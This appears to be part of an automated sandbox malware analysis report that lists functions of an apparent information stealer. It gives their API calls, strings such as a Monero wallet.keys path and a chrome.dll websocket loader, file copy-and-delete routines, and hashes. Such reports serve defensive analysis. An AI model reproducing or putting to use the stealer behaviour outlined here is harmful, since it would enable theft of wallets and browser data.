                                    Function 001912A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001912B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001912BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001912D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001912F5
                                    • RegCloseKey.ADVAPI32(?), ref: 001912FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 75042695a33e0e4a1b4afc0005e8ed5d5dc7acc091e6edaa1d4a9e732c981adb
                                    • Instruction ID: a5fd1a688ffe350690356e27abec8e02ac7cf8a069b813cb3399079d51a11467
                                    • Opcode Fuzzy Hash: 75042695a33e0e4a1b4afc0005e8ed5d5dc7acc091e6edaa1d4a9e732c981adb
                                    • Instruction Fuzzy Hash: 7D01E1B9A44209BFDB04DFD4DC99FAE7778EB48705F1041A5FA0597280E7B09A408B95
                                    Function 001ACB7E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: cde2b6c02b19ad46c6b9dcc3b8e57fad6c091f603f6f9c88bd26c0e356f46da2
                                    • Instruction ID: 073925addb4f461d4fa9e4997ac82d66daf676de9246d57e13d39ddbb57f5ed0
                                    • Opcode Fuzzy Hash: cde2b6c02b19ad46c6b9dcc3b8e57fad6c091f603f6f9c88bd26c0e356f46da2
                                    • Instruction Fuzzy Hash: 7C4118B810079C9EDB318B28CC85FFB7BEC9B46314F1444E8E98A97146D3719A44CFA0
                                    Function 001A68D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 001A6903
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 001A69C6
                                    • ExitProcess.KERNEL32 ref: 001A69F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: 254bffcfa82663611e074c0a5f365936b497a5de972c365b18fbd5b4b4c0794d
                                    • Instruction ID: 2ff4af6df785e28042a6f1715be973d9cfb79640fe14e4fc39a68bae11a72307
                                    • Opcode Fuzzy Hash: 254bffcfa82663611e074c0a5f365936b497a5de972c365b18fbd5b4b4c0794d
                                    • Instruction Fuzzy Hash: E2313EB5901218ABDB54EFA0DC92FDEB778AF18300F804199F20567191EF746B48CF69
                                    Function 001A8950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001B0E10,00000000,?), ref: 001A89BF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A89C6
                                    • wsprintfA.USER32 ref: 001A89E0
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 1c16980053b4c5b757dce83f8759dd026af0ab341c9aecc7dbfc6e5a3765a805
                                    • Instruction ID: 58ea95d1260b78ef7abb8a51f02beb3c5617c6c2437799599f26b2330303532c
                                    • Opcode Fuzzy Hash: 1c16980053b4c5b757dce83f8759dd026af0ab341c9aecc7dbfc6e5a3765a805
                                    • Instruction Fuzzy Hash: 8D2172B1A44204AFDB00DFD4DD55FAEBBB8FB49B14F108259FA05A7280D7B59900CBA5
                                    Function 0019A090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0019A098
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                    • API String ID: 1029625771-1545816527
                                    • Opcode ID: 8cabc9ded9b93094248c44a47283054f87d71f762aaa230734dc19cae0122339
                                    • Instruction ID: 6b63f378fefa2a2c282c576310e61bdf68156450f82a9e69e3c4076f7df632c4
                                    • Opcode Fuzzy Hash: 8cabc9ded9b93094248c44a47283054f87d71f762aaa230734dc19cae0122339
                                    • Instruction Fuzzy Hash: 7DF09AB068D210BFDB01AB60EC04B6236E8EB0574CF900435F005932A0E3F5A8C8CBBB
                                    Function 001A8EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001A96AE,00000000), ref: 001A8EEB
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A8EF2
                                    • wsprintfW.USER32 ref: 001A8F08
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: 612d87a3f92d1b647b45bdc996422f2d60f198fbc3b362483f6a08ae5ddb081f
                                    • Instruction ID: 230eff588ad4f101e5b8a86e263665c2952ea35079e0bc3c3c292e1a78775d17
                                    • Opcode Fuzzy Hash: 612d87a3f92d1b647b45bdc996422f2d60f198fbc3b362483f6a08ae5ddb081f
                                    • Instruction Fuzzy Hash: B2E08CB4A48308BBDB00CB94DD0AEAD7BB8EB09705F0001A5FD0987340EAB19E008B96
                                    Function 0019A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001A8CF0: GetSystemTime.KERNEL32(001B0E1B,00E2AB38,001B05B6,?,?,001913F9,?,0000001A,001B0E1B,00000000,?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001A8D16
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0019AA11
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 0019AB2F
                                    • lstrlen.KERNEL32(00000000), ref: 0019ADEC
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                    • DeleteFileA.KERNEL32(00000000), ref: 0019AE73
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 17b4950cacb15b6d572b1f2bafdab74a12302aece3623db72cb9c8f0eec01491
                                    • Instruction ID: b9050f8def2a50cf918c9fd334bca921d2c2560a6ade5f1876007b306cf24640
                                    • Opcode Fuzzy Hash: 17b4950cacb15b6d572b1f2bafdab74a12302aece3623db72cb9c8f0eec01491
                                    • Instruction Fuzzy Hash: 8DE1E076910118ABCB54FBA4DDA2EEE7339AF25300F908569F11672091EF707A4CCB76
                                    Function 0019D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001A8CF0: GetSystemTime.KERNEL32(001B0E1B,00E2AB38,001B05B6,?,?,001913F9,?,0000001A,001B0E1B,00000000,?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001A8D16
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0019D581
                                    • lstrlen.KERNEL32(00000000), ref: 0019D798
                                    • lstrlen.KERNEL32(00000000), ref: 0019D7AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 0019D82B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 5d37fa709af5f6e9c6a80a5e3498d98db49e88ce663c560fbf242affea771be6
                                    • Instruction ID: ecce85c4ea670189ba08ad616707de37482593b9c283815a08ebf31f69e83411
                                    • Opcode Fuzzy Hash: 5d37fa709af5f6e9c6a80a5e3498d98db49e88ce663c560fbf242affea771be6
                                    • Instruction Fuzzy Hash: CB910176950108ABCB54FBA4DDA2EEE7339AF65300F908569F11672091EF707A08CB76
                                    Function 0019D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001A8CF0: GetSystemTime.KERNEL32(001B0E1B,00E2AB38,001B05B6,?,?,001913F9,?,0000001A,001B0E1B,00000000,?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001A8D16
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0019D901
                                    • lstrlen.KERNEL32(00000000), ref: 0019DA9F
                                    • lstrlen.KERNEL32(00000000), ref: 0019DAB3
                                    • DeleteFileA.KERNEL32(00000000), ref: 0019DB32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 786542e8120bd17fadcdc9c80d38ea72bc232ab180d06cae39ec6faf1368c648
                                    • Instruction ID: ca8a58787ade5521a53e697de3f550e90e8b736ddbdc864350eff5031afc7c68
                                    • Opcode Fuzzy Hash: 786542e8120bd17fadcdc9c80d38ea72bc232ab180d06cae39ec6faf1368c648
                                    • Instruction Fuzzy Hash: 3E810E76950108ABCF54FBA4DCA6EEE7339AF66300F804569F11667091EF707A08CB76
                                    Function 0020FED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
